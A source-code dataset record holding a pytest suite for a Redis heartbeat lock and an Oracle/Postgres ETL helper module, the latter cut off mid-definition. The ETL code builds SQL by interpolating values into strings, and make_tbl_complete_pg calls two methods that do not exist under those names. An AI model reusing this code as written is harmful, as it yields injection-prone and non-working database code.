| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5aadafb8a71e00148d455e98ea4a699b91cf609
| 4,550
|
py
|
Python
|
tests/test_simple_redis_lock.py
|
fwallacevt/simple-redis-lock
|
171e102c38ed04e3ab268318aa6bbc6459b4aefd
|
[
"MIT"
] | 1
|
2021-04-23T06:41:52.000Z
|
2021-04-23T06:41:52.000Z
|
tests/test_simple_redis_lock.py
|
fwallacevt/simple-redis-lock
|
171e102c38ed04e3ab268318aa6bbc6459b4aefd
|
[
"MIT"
] | null | null | null |
tests/test_simple_redis_lock.py
|
fwallacevt/simple-redis-lock
|
171e102c38ed04e3ab268318aa6bbc6459b4aefd
|
[
"MIT"
] | 1
|
2021-04-25T03:21:02.000Z
|
2021-04-25T03:21:02.000Z
|
#!/usr/bin/env python
"""Tests for `redis-heartbeat-lock` package."""
# pylint: disable=redefined-outer-name
import asyncio
import pytest
from redis_heartbeat_lock import async_lock, context_manager
@pytest.mark.asyncio
async def test_raises_if_exception_occurs():
    """Tests that if an exception occurs during the block, we get that exception.

    Also verifies the heartbeat task is cancelled and the redis lock key is
    released despite the exception. Requires a local redis at 127.0.0.1:6379.
    """
    # First, build our redis client and heartbeat manager...
    redis = await async_lock.AsyncLock.create(
        key="test_raises_if_exception_occurs",
        url="redis://127.0.0.1:6379",
        lock_acquisition_timeout=2.0,
        lock_expiry=2,
    )
    heartbeat = context_manager.ContextManager(period=1.0, redis=redis)
    with pytest.raises(
        Exception, match=r"Failed!",
    ):
        async with heartbeat as _:
            # Plain string literal: the previous f-string had no placeholders (F541).
            raise Exception("Failed!")
    # The heartbeat task must have been cancelled and the lock released.
    assert heartbeat.future.done() is True
    assert heartbeat.future.cancelled() is True
    assert await redis.exists() == 0
@pytest.mark.asyncio
async def test_cleans_up_if_nothing_happens():
    """An empty context block must still cancel the heartbeat and drop the lock."""
    # Acquire a lock client pointed at the local redis instance.
    client = await async_lock.AsyncLock.create(
        key="test_cleans_up_if_nothing_happens",
        url="redis://127.0.0.1:6379",
        lock_acquisition_timeout=2.0,
        lock_expiry=2,
    )
    hb = context_manager.ContextManager(period=1.0, redis=client)
    async with hb as _:
        pass
    # Heartbeat task finished via cancellation, and the redis key is gone.
    assert hb.future.done() is True
    assert hb.future.cancelled() is True
    assert await client.exists() == 0
@pytest.mark.asyncio
async def test_can_run_things_in_the_foreground():
    """Foreground work can proceed while the heartbeat keeps the lock alive."""
    # Acquire a lock client pointed at the local redis instance.
    client = await async_lock.AsyncLock.create(
        key="test_can_run_things_in_the_foreground",
        url="redis://127.0.0.1:6379",
        lock_acquisition_timeout=2.0,
        lock_expiry=2,
    )
    hb = context_manager.ContextManager(period=1.0, redis=client)
    async with hb as _:
        # Simulate five seconds of real work while holding the lock.
        await asyncio.sleep(5)
        print("Did some stuff!")
    # On exit the heartbeat is cancelled and the lock released.
    assert hb.future.done() is True
    assert hb.future.cancelled() is True
    assert await client.exists() == 0
@pytest.mark.asyncio
async def test_gets_lock():
    """While the heartbeat runs, a competing set_lock must be refused."""
    # Acquire a lock client pointed at the local redis instance.
    client = await async_lock.AsyncLock.create(
        key="test_gets_lock",
        url="redis://127.0.0.1:6379",
        lock_acquisition_timeout=2.0,
        lock_expiry=4,
    )
    hb = context_manager.ContextManager(period=1.0, redis=client)
    async with hb as _:
        # A second locker must fail while the heartbeat holds the key.
        contender = await client.set_lock(True, True)
        assert contender == False
    # On exit the lock key must be gone.
    assert await client.exists() == 0
@pytest.mark.asyncio
async def test_errors_if_lock_is_acquired():
    """Entering the context must fail when another party already holds the lock."""
    client = await async_lock.AsyncLock.create(
        key="test_errors_if_lock_is_acquired",
        url="redis://127.0.0.1:6379",
        lock_acquisition_timeout=2.0,
        lock_expiry=8,
    )
    # Take the lock up front, posing as a competing worker.
    held = await client.set_lock(True, True)
    assert held == True
    hb = context_manager.ContextManager(period=1.0, redis=client)
    with pytest.raises(
        Exception, match=r"Failed to get lock",
    ):
        async with hb as _:
            pass
    # The competing worker's lock must still be present.
    assert await client.exists() == 1
@pytest.mark.asyncio
async def test_holds_lock():
    """The heartbeat must renew the lock well past its initial expiry."""
    client = await async_lock.AsyncLock.create(
        key="test_holds_lock",
        url="redis://127.0.0.1:6379",
        lock_acquisition_timeout=2.0,
        lock_expiry=4,
    )
    hb = context_manager.ContextManager(period=2.0, redis=client)
    async with hb as _:
        # Immediately, and again after each five-second wait, a competing
        # set_lock must be rejected because the heartbeat renews the key.
        taken = await client.set_lock(True, True)
        assert taken == False
        for _ in range(2):
            await asyncio.sleep(5)
            taken = await client.set_lock(True, True)
            assert taken == False
    # On exit the lock key must be gone.
    assert await client.exists() == 0
| 30.536913
| 84
| 0.672747
| 615
| 4,550
| 4.826016
| 0.188618
| 0.037062
| 0.034367
| 0.044474
| 0.815027
| 0.782682
| 0.720687
| 0.702493
| 0.702493
| 0.689353
| 0
| 0.028077
| 0.225055
| 4,550
| 148
| 85
| 30.743243
| 0.81367
| 0.118022
| 0
| 0.704082
| 0
| 0
| 0.094866
| 0.073661
| 0
| 0
| 0
| 0
| 0.173469
| 1
| 0
| false
| 0.020408
| 0.030612
| 0
| 0.030612
| 0.010204
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5bc902e49cfa923bbb69f6eb59d03d8dd8d1273
| 88,473
|
py
|
Python
|
fusetools/db_etl_tools.py
|
fusecloud/fusetools
|
4352d0beebd4d676b8578a1f96977553d3ebf28c
|
[
"MIT"
] | 6
|
2021-01-05T17:45:01.000Z
|
2021-01-06T16:25:50.000Z
|
fusetools/db_etl_tools.py
|
fusecloud/fusetools
|
4352d0beebd4d676b8578a1f96977553d3ebf28c
|
[
"MIT"
] | 2
|
2021-01-09T23:25:04.000Z
|
2021-01-09T23:26:07.000Z
|
fusetools/db_etl_tools.py
|
fusecloud/fusetools
|
4352d0beebd4d676b8578a1f96977553d3ebf28c
|
[
"MIT"
] | 1
|
2021-09-02T00:24:03.000Z
|
2021-09-02T00:24:03.000Z
|
"""
Database connections and engines.
|pic1| |pic2| |pic3| |pic4|
.. |pic1| image:: ../images_source/db_etl_tools/oracle1.png
:width: 20%
.. |pic2| image:: ../images_source/db_etl_tools/postgres1.png
:width: 20%
.. |pic3| image:: ../images_source/db_etl_tools/teradata.png
:width: 20%
.. |pic4| image:: ../images_source/db_etl_tools/redshift1.png
:width: 20%
"""
from datetime import datetime
import os
import re
import time
import cx_Oracle
import numpy as np
import pandas as pd
import psycopg2
from colorama import Fore
from sqlalchemy import text
import psycopg2.extras
from fusetools.text_tools import Export
class Generic:
    """
    Generic functions for SQL queries and ETL.
    """

    @classmethod
    def make_groupby(cls, sql, dim_fact_delim):
        """
        Creates a dynamically generated GROUP BY clause for a given SQL statement.

        :param sql: SQL statement provided.
        :param dim_fact_delim: Delimiter between the dimension and fact columns.
        :return: A complete SQL statement with dynamically generated GROUP BY clause.
        """
        # Dimension columns are the "expr as alias" terms before the delimiter;
        # group by each alias.
        select_body = sql.replace("\n", "").split("SELECT")[1]
        dim_aliases = [
            seg.split(" as ")[1].strip()
            for seg in select_body.split(dim_fact_delim)[0].split(", ")
            if seg.strip() != ''
        ]
        sql_all = sql + " GROUP BY " + ', '.join(dim_aliases)
        # Collapse newlines and strip double quotes so the statement is one clean line.
        return sql_all.replace("\n", " ").replace('"', "")

    @classmethod
    def make_db_schema(cls, df):
        """
        Creates a mapping of Pandas data types to SQL data types.

        :param df: A Pandas DataFrame with column types to be converted.
        :return: A Pandas DataFrame with columns ``col``, ``dtype_new``,
            ``dtype_old`` and ``dtype_final``.
        """
        cols = []
        dtypes = []
        for col in df.columns:
            cols.append(col)
            # Blank-only strings count as missing values.
            col_series = df[col].replace(r'^\s*$', np.nan, regex=True).dropna()
            # A value looks like a date when its first 10 chars split into
            # three parts on "-" (YYYY-MM-DD).
            try:
                date_len = max(col_series.astype("str").str[:10].str.split("-").apply(lambda x: len(x)))
                if date_len == 3:
                    dtypes.append("datetime64[ns]")
                    continue
            except Exception:  # empty column: max() of nothing
                date_len = 0
            # Numeric check; `is_int` replaces the original `int`, which
            # shadowed the builtin.
            try:
                is_int = col_series.astype("float").apply(float.is_integer).all()
            except Exception:  # not numeric at all
                dtypes.append("object")
                continue
            # Date columns already continued above, so only the numeric
            # distinction remains here.
            dtypes.append("Int64" if is_int else "float")
        schema_df = pd.DataFrame({"col": cols, "dtype_new": dtypes})
        old_schema_df = pd.DataFrame(df.dtypes, columns=["dtype_old"]).reset_index()
        schema_df2 = pd.merge(schema_df, old_schema_df, how="inner", left_on="col", right_on="index")
        # Keep the inferred dtype unless it stayed "object", in which case
        # fall back to the original dtype.
        schema_df2['dtype_final'] = np.where(
            schema_df2['dtype_new'] != "object",
            schema_df2['dtype_new'],
            schema_df2['dtype_old']
        )
        return schema_df2

    @classmethod
    def db_apply_schema(cls, df, schema_df):
        """
        Converts Pandas DataFrame columns based on schema DataFrame provided.

        :param df: A Pandas DataFrame with column types to be converted.
        :param schema_df: A Pandas DataFrame of columns with corresponding SQL data types
            (as produced by :meth:`make_db_schema`).
        :return: Pandas DataFrame with columns converted to the SQL schema.
        """
        # np.nan replaces the removed pd.np alias (pandas >= 2.0).
        df_ret = df.replace(r'^\s*$', np.nan, regex=True)
        df_ret = df_ret.replace('', np.nan, regex=True)
        df_ret = df_ret.replace({np.nan: None})
        for idx, row in schema_df.iterrows():
            col = row['col']
            if row['dtype_final'] == "Int64":
                # Round-trip through float so "1.0"-style strings cast cleanly.
                df_ret[col] = df_ret[col].replace({np.nan: None})
                df_ret[col] = df_ret[col].astype(float).astype("Int64")
            elif row['dtype_final'] == "datetime64[ns]":
                # Unparseable dates become NaT rather than raising.
                df_ret[col] = pd.to_datetime(df_ret[col], errors="coerce")
            else:
                df_ret[col] = df_ret[col].replace({np.nan: None})
                df_ret[col] = df_ret[col].astype(row['dtype_final'])
        return df_ret

    @classmethod
    def make_db_cols(cls, df):
        """
        Returns a Pandas DataFrame whose column names are converted for database standards.

        :param df: A Pandas DataFrame with columns to be transformed.
        :return: The same DataFrame with sanitized, lowercase, underscore-separated
            column names (truncated to 200 chars).
        """
        columns = [re.sub('#', 'num', col) for col in df.columns]
        columns = [re.sub('%', 'pct', col) for col in columns]
        # Any remaining non-alphanumeric run collapses to a single space.
        columns = [re.sub('[^a-zA-Z0-9]+', ' ', col) for col in columns]
        columns = [col.replace(" ", "_") for col in columns]
        columns = [col[:200] for col in columns]
        columns = [col.lower() for col in columns]
        columns = [c.lstrip("_").rstrip("_") for c in columns]
        df.columns = columns
        return df

    @classmethod
    def run_query(cls, engine, sql):
        """
        Executes a SQL query and prints its runtime in minutes.

        :param engine: A database engine object (must support ``.execute``).
        :param sql: A SQL statement to be executed.
        :return: None; the elapsed time is printed in red.
        """
        rptg_tstart = datetime.now()
        engine.execute(sql)
        rptg_tend = datetime.now()
        tdelta = (rptg_tend - rptg_tstart).total_seconds() / 60
        print(Fore.RED + f"Runtime: {tdelta}")
class Oracle:
"""
Generic functions for Oracle SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/oracle1.png
"""
@classmethod
def make_tbl(cls, df, tbl_name):
"""
Provides a CREATE TABLE SQL statement for a given Pandas DataFrame.
:param df: A Pandas DataFrame to be added as an Oracle table.
:param tbl_name: Oracle table name to be created.
:return: CREATE TABLE SQL statement.
"""
for idx, col in enumerate(df):
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
if idx == 0:
col_desc_all = [col_desc]
else:
col_desc_all.append(col_desc)
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = col_desc_all['char'].str.split('-', 1).str
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
d = {'object': 'VARCHAR',
'int64': 'NUMBER',
'float64': 'VARCHAR',
'datetime64[ns]': 'VARCHAR'}
col_desc_all = col_desc_all.replace(d)
col_desc_all['concat'] = np.where(col_desc_all['type'] != "NUMBER",
col_desc_all['column'] + " " + col_desc_all['type'] + "(" + col_desc_all[
'length'] + ")",
col_desc_all['column'] + " " + col_desc_all['type'])
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def insert_tbl(cls, df, tbl_name):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame.
:param df: A Pandas DataFrame with values to be inserted.
:param tbl_name: An Oracle table for Pandas DataFrame to be inserted into.
:return: SQL for INSERT INTO statement.
"""
sql = 'INSERT INTO ' + tbl_name + '(' + ', '.join(df.columns) + ') VALUES (' + ''.join(
[':' + str(v) + ', ' for v in list(range(1, len(df.columns)))]) + ':' + str(len(df.columns)) + ')'
return sql
@classmethod
def insert_exec(cls, sql, conn, df):
    """
    Executes a prepared INSERT statement once per DataFrame row and commits.

    :param sql: A SQL INSERT statement with :1..:N positional bind variables.
    :param conn: A cx_Oracle database connection.
    :param df: A Pandas DataFrame whose rows supply the bind values.
    :return: Nothing.
    """
    cursor = cx_Oracle.Cursor(conn)
    cursor.prepare(sql)
    # None reuses the statement prepared above; each row's values bind to :1..:N.
    cursor.executemany(None, df.values.tolist())
    conn.commit()
    cursor.close()
    # conn.close()  NOTE(review): connection intentionally left open for reuse — confirm
@classmethod
def make_tbl_complete_force(cls, df, tbl_name, eng, conn, attempt_n,
                            subcols=False, chunks=False, chunks_delay=False):
    """
    Executes a series of SQL statements to CREATE and INSERT into a table from
    a Pandas DataFrame, retrying each failed chunk INSERT up to attempt_n times.

    BUG FIX: the retry loop previously never exited after a *successful*
    insert (attempts was only decremented on failure), which re-inserted the
    same chunk forever. A ``break`` on success fixes this; the inter-chunk
    delay now runs once per chunk rather than once per retry.

    :param df: Pandas DataFrame to create a table from.
    :param tbl_name: Name of table to be created.
    :param eng: Oracle database engine object.
    :param conn: Oracle database connection object.
    :param attempt_n: Number of times to attempt each chunk's INSERT statement.
    :param subcols: A list of columns of the Pandas DataFrame to apply operations on.
    :param subcols: A list of columns to restrict the load to (False = all).
    :param chunks: Number of chunks to split the Pandas DataFrame into (False = no split).
    :param chunks_delay: Delay in seconds between chunk INSERTs (False = 2s default).
    :return: None; progress is reported via print statements.
    """
    if len(df) == 0:
        # Nothing to load; skip table creation entirely (matches legacy behavior).
        return
    if subcols:
        df = df[subcols]
    # Everything is loaded as text; blanks stand in for NULLs.
    df.fillna(' ', inplace=True)
    df = df.astype(str)
    # make create table sql
    sql = cls.make_tbl(df, tbl_name)
    print(sql)
    # Best-effort drop: the table may not exist yet. Narrowed from a bare
    # except so KeyboardInterrupt/SystemExit are not swallowed.
    try:
        eng.execute("drop table " + str(tbl_name))
    except Exception as e:
        print(str(e))
    # create table
    eng.execute(sql)
    if chunks:
        # Load in chunks to keep individual INSERTs small.
        for sub in np.array_split(df, chunks):
            sql = cls.insert_tbl(sub, tbl_name)
            print(sql)
            attempts = attempt_n
            while attempts > 0:
                try:
                    cls.insert_exec(sql, conn, sub)
                    break  # success: stop retrying this chunk
                except Exception:
                    attempts -= 1
                    print(Fore.RED + f"Failed upload attempt...{attempts} remaining.")
                    time.sleep(1)
            # Throttle between chunks (default 2s) to avoid hammering the DB.
            time.sleep(chunks_delay if chunks_delay else 2)
    else:
        sql = cls.insert_tbl(df, tbl_name)
        print(sql)
        cls.insert_exec(sql, conn, df)
@classmethod
def make_tbl_complete(cls, df, tbl_name, eng, conn, subcols=False, chunks=False, chunks_delay=False):
    """
    Executes a series of SQL statements to CREATE and INSERT into a table from
    a Pandas DataFrame.

    :param df: Pandas DataFrame to create a table from.
    :param tbl_name: Name of table to be created.
    :param eng: Oracle database engine object.
    :param conn: Oracle database connection object.
    :param subcols: A list of columns to restrict the load to (False = all).
    :param chunks: Number of chunks to split the Pandas DataFrame into (False = no split).
    :param chunks_delay: Delay in seconds between chunk INSERTs (False = 2s default).
    :return: None; progress is reported via print statements.
    """
    if len(df) == 0:
        # Nothing to load; skip table creation entirely (matches legacy behavior).
        return
    if subcols:
        df = df[subcols]
    # Everything is loaded as text; blanks stand in for NULLs.
    df.fillna(' ', inplace=True)
    df = df.astype(str)
    # make create table sql
    sql = cls.make_tbl(df, tbl_name)
    print(sql)
    # Best-effort drop: the table may not exist yet. Narrowed from a bare
    # except so KeyboardInterrupt/SystemExit are not swallowed.
    try:
        eng.execute("drop table " + str(tbl_name))
    except Exception:
        pass
    # create table
    eng.execute(sql)
    if chunks:
        # Load in chunks to keep individual INSERTs small.
        for sub in np.array_split(df, chunks):
            sql = cls.insert_tbl(sub, tbl_name)
            print(sql)
            cls.insert_exec(sql, conn, sub)
            # Throttle between chunks (default 2s) to avoid hammering the DB.
            time.sleep(chunks_delay if chunks_delay else 2)
    else:
        sql = cls.insert_tbl(df, tbl_name)
        print(sql)
        cls.insert_exec(sql, conn, df)
@classmethod
def get_oracle_date(cls, date):
"""
Converts a date to an Oracle date of format "DD-MMM-YYY"
:param date: A provided date.
:return: An Oracle database date.
"""
# given a datetime YYYY-MM-DD
if "-" in date:
year, month, day = str(pd.to_datetime(date)).split("-")
year = year[2:]
day = day.replace(" 00:00:00", "")
month_name = {
'01': 'JAN',
'02': 'FEB',
'03': 'MAR',
'04': 'APR',
'05': 'MAY',
'06': 'JUN',
'07': 'JUL',
'08': 'AUG',
'09': 'SEP',
'10': 'OCT',
'11': 'NOV',
'12': 'DEC'}
month = month_name.get(month)
date = day + "-" + month + "-" + year
# given an excel date
elif "/" in date:
date = str(pd.to_datetime(date)).replace(" 00:00:00", "")
year, month, day = str(pd.to_datetime(date)).split("-")
year = year[2:]
day = day.replace(" 00:00:00", "")
month_name = {
'01': 'JAN',
'02': 'FEB',
'03': 'MAR',
'04': 'APR',
'05': 'MAY',
'06': 'JUN',
'07': 'JUL',
'08': 'AUG',
'09': 'SEP',
'10': 'OCT',
'11': 'NOV',
'12': 'DEC'}
month = month_name.get(month)
date = day + "-" + month + "-" + year
return date
@classmethod
def get_orcl_date(cls, dat):
"""
Converts a date to an Oracle date of format "DD-MMM-YYY".
:param dat: A provided date column of a Pandas Series.
:return: An Oracle database date.
"""
dat['mon'] = dat.dt.month
dat['day'] = dat.dt.day
# .astype(str).str.pad(width=2, fillchar="0", side="left")
dat['year'] = dat.dt.year
mon_abbrevs = {
1: 'JAN',
2: 'FEB',
3: 'MAR',
4: 'APR',
5: 'MAY',
6: 'JUN',
7: 'JUL',
8: 'AUG',
9: 'SEP',
10: 'OCT',
11: 'NOV',
12: 'DEC'}
dat['mon_abbrevs'] = \
dat['mon'].map(mon_abbrevs)
dat['day'] = dat['day'].str[:-2]
dat['year'] = dat['year'].astype(str).str[:4]
dat['year'] = dat['year'].astype(str).str[-2:]
dat['date_comb'] = \
dat['day'].astype(str) + "-" + dat['mon_abbrevs'].astype(str) + "-" + dat['year'].astype(str)
return dat['date_comb']
@classmethod
def orcl_tbl_varchar_convert(cls, tbl_name, convert_cols, engine):
"""
Converts a set of columns to VARCHAR(300) for a given Oracle table.
:param tbl_name: Oracle table name.
:param convert_cols: List of columns to convert.
:param engine: Oracle database engine.
:return: Printed ALTER table statements for each column.
"""
# loop through
for col in convert_cols:
sql = f'''
alter table {tbl_name}
modify {col} varchar(300)
'''
print(sql)
engine.execute(text(sql).execution_options(autocommit=True))
time.sleep(1)
class Postgres:
"""
Generic functions for Postgres SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/postgres1.png
"""
@classmethod
def run_query_pg(cls, conn, sql):
"""
Executes a SQL statement with a Postgres database connection.
:param conn: Postgres database connection object,
:param sql: SQL Statement to execute.
:return: Elapsed time to execute query.
"""
rptg_tstart = datetime.now()
cur = conn.cursor()
cur.execute(sql)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def insert_val_pg(cls, col_list, val_list, tbl_name):
"""
Creates SQL to run an INSERT operation of a given Postgres table.
:param col_list: List of columns to INSERT or UPDATE.
:param val_list: List of values to INSERT or UPDATE.
:param tbl_name: Name of Postgres table.
:return: SQL to run an INSERT statement.
"""
sql = f'''
INSERT INTO {tbl_name}
(
{str(col_list).replace("[", "").replace("]", "").replace("'", "")}
) values (
{str(val_list).replace("[", "").replace("]", "")}
)
'''
return sql
@classmethod
def upsert_val_pg(cls, col_list, val_list, tbl_name, constraint_col):
"""
Creates SQL to run an UPSERT (INSERT new records or UPDATE existing records) operation of a given Postgres table.
:param col_list: List of columns to INSERT or UPDATE.
:param val_list: List of values to INSERT or UPDATE.
:param constraint_col: Column/value logic to check against for INSERT or UPDATE.
:param tbl_name: Name of Postgres table.
:return: SQL to run an UPSERT statement.
"""
update = ""
for idx, col in zip(col_list, val_list):
update = update + idx + f"='{col}',"
update = update[:update.rfind(",")]
sql = f'''
INSERT INTO {tbl_name}
({str(col_list).replace("[", "").replace("]", "").replace("'", "")})
VALUES
({str(val_list).replace("[", "").replace("]", "")})
ON CONFLICT ({constraint_col})
DO
UPDATE SET
{update}
'''
return sql
    @classmethod
    def upsert_tbl_pg(cls, src_tbl, tgt_tbl, src_join_cols, src_insert_cols,
                      src_update_cols=False, update_compare_cols=False):
        """
        Creates SQL to run an UPSERT (INSERT new records or UPDATE existing records) operation of a given Postgres table.

        Returns a (sql_update, sql_insert) pair; sql_update is "" when
        src_update_cols is not supplied.

        :param src_tbl: Postgres source table that contains data to be merged from.
        :param tgt_tbl: Postgres target table to receive UPSERT operation.
        :param src_join_cols: Columns to use to join source and target tables.
        :param src_insert_cols: Columns to be inserted from source table.
        :param src_update_cols: Columns to be updated from source table.
        :param update_compare_cols: Columns to use to compare values across source and target tables.
        :return: A SQL Update statement and a SQL Insert statement (in that order).
        """
        # "t.a = s.a AND t.b = s.b" -- join predicate between target (t) and source (s).
        # NOTE(review): built by stringifying a list and stripping [ ] ' , --
        # column names containing any of those characters would be mangled.
        src_join_cols_ = (
            str([f"t.{c} = s.{c} AND "
                 for c in src_join_cols])
            .replace("[", "")
            .replace("]", "")
            .replace("'", "")
            .replace(",", "")
        )
        # drop the trailing "AND "
        src_join_cols_ = src_join_cols_[:src_join_cols_.rfind("AND")]
        # "t.a IS NULL AND ..." -- anti-join filter used to keep only new rows
        src_join_cols_f = (
            str([f"t.{c} IS NULL AND "
                 for c in src_join_cols])
            .replace("[", "")
            .replace("]", "")
            .replace("'", "")
            .replace(",", "")
        )
        src_join_cols_f = src_join_cols_f[:src_join_cols_f.rfind("AND")]
        # "s.a, s.b" -- source-qualified column list for the INSERT's SELECT
        src_insert_cols_ = (
            str([f"s.{c}"
                 for c in src_insert_cols])
            .replace("[", "")
            .replace("]", "")
            .replace("'", "")
        )
        if src_update_cols:
            # "a = s.a, b = s.b" -- SET list for the UPDATE statement
            src_update_cols_ = (
                str([f"{c} = s.{c},"
                     for c in src_update_cols])
                .replace("[", "")
                .replace("]", "")
                .replace("', '", "")
                .replace("'", "")
            )
            src_update_cols_ = src_update_cols_[:src_update_cols_.rfind(",")]
            # update join statement: qualify target columns with the table name
            src_join_cols2_ = src_join_cols_.replace("t.", f"{tgt_tbl}.")
            if update_compare_cols:
                # only update rows whose compared values actually differ
                update_compare_cols_ = (
                    str([f"s.{c} != {tgt_tbl}.{c},"
                         for c in update_compare_cols])
                    .replace("[", "")
                    .replace("]", "")
                    .replace("', '", "")
                    .replace("'", "")
                )
                update_compare_cols_ = update_compare_cols_[:update_compare_cols_.rfind(",")]
                src_join_cols2_ = src_join_cols2_ + " AND " + update_compare_cols_
            # src_join_cols2_ = src_join_cols2_.replace("t.", f"{tgt_tbl}.")
            # https://dwgeek.com/amazon-redshift-merge-statement-alternative-and-example.html/
            sql_update = f'''
            /* Update records*/
            UPDATE {tgt_tbl}
            SET {src_update_cols_}
            FROM {src_tbl} s
            WHERE {src_join_cols2_}
            '''.replace("\n", " ")
        else:
            sql_update = ""
        # insert rows that have no match in the target (left join + IS NULL)
        sql_insert = f'''
        /* Insert records*/
        INSERT INTO {tgt_tbl}
        SELECT {src_insert_cols_}
        FROM {src_tbl} s
        LEFT JOIN {tgt_tbl} t
        ON {src_join_cols_}
        WHERE {src_join_cols_f}
        '''.replace("\n", " ")
        return sql_update, sql_insert
@classmethod
def make_df_tbl_pg(cls, tbl_name, df):
"""
Creates SQL to run a CREATE TABLE statement based on a Pandas DataFrame.
:param tbl_name: Postgres table name.
:param df: Pandas DataFrame.
:return: CREATE TABLE SQL statement.
"""
# fix columns
df = Generic.make_db_cols(df)
# loop thru the columns
for idx, col in enumerate(df):
# find the max length of each field
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
# find the max value of each fields
try:
col_max = col + "-" + str(max(df[col]))
except:
col_max = col + "-" + 'NA'
if idx == 0:
col_desc_all = [col_desc]
col_max_all = [col_max]
else:
col_desc_all.append(col_desc)
col_max_all.append(col_max)
# make df of column lengths
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = \
col_desc_all['char'].str.split('-', 1).str
# make df of column max
col_max_all = pd.DataFrame(col_max_all)
col_max_all.columns = ["char"]
col_max_all['column'], col_max_all['max'] = \
col_max_all['char'].str.split('-', 1).str
# make df of column dtypes
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
# join dfs
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
col_desc_all = pd.merge(
col_desc_all,
col_max_all[["column", "max"]],
how="inner",
on="column")
# define data type mapping (pandas --> teradata)
d = {'object': 'VARCHAR',
'int64': 'INTEGER',
'Int64': 'INTEGER',
'int32': 'INTEGER',
'bool': 'VARCHAR',
'float64': 'FLOAT',
'datetime64[ns]': 'TIMESTAMP',
"datetime64[ns, UTC]": "TIMESTAMP"}
col_desc_all = col_desc_all.astype(str).replace(d)
# list the columns where you want to specify the lengths
col_desc_all['concat'] = np.where(
# if varchar, use the length of the longest char
col_desc_all['type'] == "VARCHAR",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str) + \
"(" + col_desc_all['length'] + ")",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str))
# convert integers with a max val over certain amount to varchar
for idx, row in col_desc_all.iterrows():
if str(row['type']) == 'INTEGER' and row['max'] != "nan" and int(row['max']) > 2147483647:
val = row['concat']
col_desc_all.loc[idx, 'concat'] = \
val.replace(
" INTEGER",
f" VARCHAR({row['length']})")
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def insert_df_pg(cls, cursor, conn, df, tbl_name):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame into a Postgres table..
:param cursor: Postgres database cursor object.
:param conn: Postgres database connection object.
:param df: Pandas DataFrame to insert into a Postgres table.
:param tbl_name: Postgres table name.
:return: Elapsed time to execute query.
"""
df_load = df.replace({pd.np.nan: None})
df_load = df_load.round(3)
df_columns = list(df_load)
# create (col1,col2,...)
columns = ",".join(df_columns)
values = "VALUES({})".format(",".join(["%s" for _ in df_columns]))
insert_stmt = "INSERT INTO {} ({}) {}".format(tbl_name, columns, values)
rptg_tstart = datetime.now()
psycopg2.extras.execute_batch(cursor, insert_stmt, df_load.values)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def make_tbl_complete_pg(cls, df, tbl_name, conn, cursor, batch_size=False):
"""
Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.
:param df: Pandas DataFrame to create a table from.
:param tbl_name: Name of table to be created.
:param conn: Postgres database connection object.
:param cursor: Postgres database cursor object.
:param batch_size: Records to load per batch.
:return: Elapsed time to execute query.
"""
# 1 drop the table
print(f"dropping table: {tbl_name}")
try:
cls.run_query_pg(sql=f"drop table {tbl_name}", conn=conn)
except:
print(f"table doesn't exist: {tbl_name}")
pass
# create the table
print(f"creating table: {tbl_name}")
sql = cls.make_tbl_pg(df=df, tbl_name=tbl_name)
print(sql)
cls.run_query_pg(sql=sql, conn=conn)
print(f"inserting DF values into table: {tbl_name}")
rptg_tstart = datetime.now()
cls.insert_pg(df=df, tbl=tbl_name, cursor=cursor, conn=conn, batch_size=batch_size)
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def sequential_load_pg(cls,
override,
tgt_tbl,
conn,
dt_start,
dt_end,
saved_day_id_range_placeholder,
dt1_interval,
dt2_interval,
sql_loop_fn,
sql_loop_fn_type,
filter_day_id_field1=False,
sql_loop_fn_dt_placeholder1=False,
